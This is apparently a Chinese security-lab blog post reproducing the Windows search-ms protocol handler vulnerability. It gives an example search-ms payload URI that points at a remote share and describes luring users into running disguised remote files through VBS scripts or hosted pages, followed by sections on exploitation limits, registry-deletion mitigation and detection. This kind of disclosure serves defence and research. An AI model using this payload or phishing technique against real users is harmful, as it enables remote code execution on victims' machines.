Windows Search Protocol漏洞复现

admin 2023年3月6日20:31:23评论43 views字数 1308阅读4分21秒阅读模式


>>>0x00 概述

继Windows漏洞CVE-2022-30190之后,安全研究人员发现了一个新的Windows Search零日漏洞。Windows的URI协议处理程序search-ms可以使用应用程序和HTML链接在设备上进行自定义搜索,该协议旨在促进使用本地设备索引的 Windows搜索,但攻击者可强制操作系统在远程主机上执行文件共享查询。利用该漏洞,攻击者可以在受害者主机自动打开一个搜索窗口,其中包含远程托管的恶意文件。攻击者对恶意文件进行伪装,并诱导用户进行执行。
 
另外,有安全研究员发现,将search-ms协议处理程序与另一个新发现的Office OLEObject漏洞相配合,可以让攻击者通过打开Word文档即启动自定义搜索窗口。甚至,攻击者可以创建富文本格式 (RTF) 文件,通过资源管理器中的预览选项卡自动启动自定义Windows搜索窗口,而无需打开钓鱼文档。



>>>0x01 漏洞利用


示例Payload
search-ms:query=procmon.exe&crumb=location:%5C%5Clive.sysinternals.com%5Ctools&displayname=ImportantUpdate

利用其他类型文件,诱导用户点击执行。

vbs脚本 
Windows Search Protocol漏洞复现

托管恶意网页
Windows Search Protocol漏洞复现
 
用户点击执行
Windows Search Protocol漏洞复现
 
标机利用限制
 
标机存在出网限制

比如,对于示Payload中的测试托管网站live.sysinternals.com,Web网关会禁止部分路径访问。

Windows Search Protocol漏洞复现

寻找可出网域名搭建WebDAV服务,可确认该限制。

Windows Search Protocol漏洞复现
Windows Search Protocol漏洞复现

需要用户交互,二次点击。

e.g
Windows Search Protocol漏洞复现

标机禁止远程共享路径exe文件执行。

e.g
Windows Search Protocol漏洞复现



>>>> 0x02 漏洞缓解


该漏洞目前还处于0day状态,微软官方尚未发布安全补丁。但有缓解措施可防御攻击。
 
管理员身份运行CMD,删除以下对应注册表项
reg delete HKEY_CLASSES_ROOTsearch-ms /f

删除后再次利用,提示无法打开对应search-ms链接。

e.g
Windows Search Protocol漏洞复现



>>>0x03 漏洞检测


该漏洞利用过程中,如果用户点击执行了攻击者的钓鱼程序,explorer.exe进程将创建一个UNC路径的进程。该动作与主机正常程序执行明显不同,因此利用该特征进行检测。虽可能存在用户打开企业内部文件共享并执行的情况,但可通过添加排除项进行缓解。

e.g
Windows Search Protocol漏洞复现
Windows Search Protocol漏洞复现


银河实验室

Windows Search Protocol漏洞复现

银河实验室(GalaxyLab)是平安集团信息安全部下一个相对独立的安全实验室,主要从事安全技术研究和安全测试工作。团队内现在覆盖逆向、物联网、Web、Android、iOS、云平台区块链安全等多个安全方向。
官网:http://galaxylab.pingan.com.cn/



往期回顾


技术

水坑钓鱼研究

技术

S2-062漏洞原理分析

技术

利用Outlook宏创建基于邮件触发的后门

技术

技术解析 | JWT弱点的利用方式

注意!PSRC中秋月饼礼盒发放规则升级!戳👇领取中秋礼盒

Windows Search Protocol漏洞复现


【中秋专场】奖金翻倍+丰富周边,玩转PSRC👇

Windows Search Protocol漏洞复现



点赞、分享,感谢你的阅读▼ 


▼ 点击阅读原文,进入官网

原文始发于微信公众号(平安集团安全应急响应中心):Windows Search Protocol漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月6日20:31:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Windows Search Protocol漏洞复现https://cn-sec.com/archives/1248640.html

发表评论

匿名网友 填写信息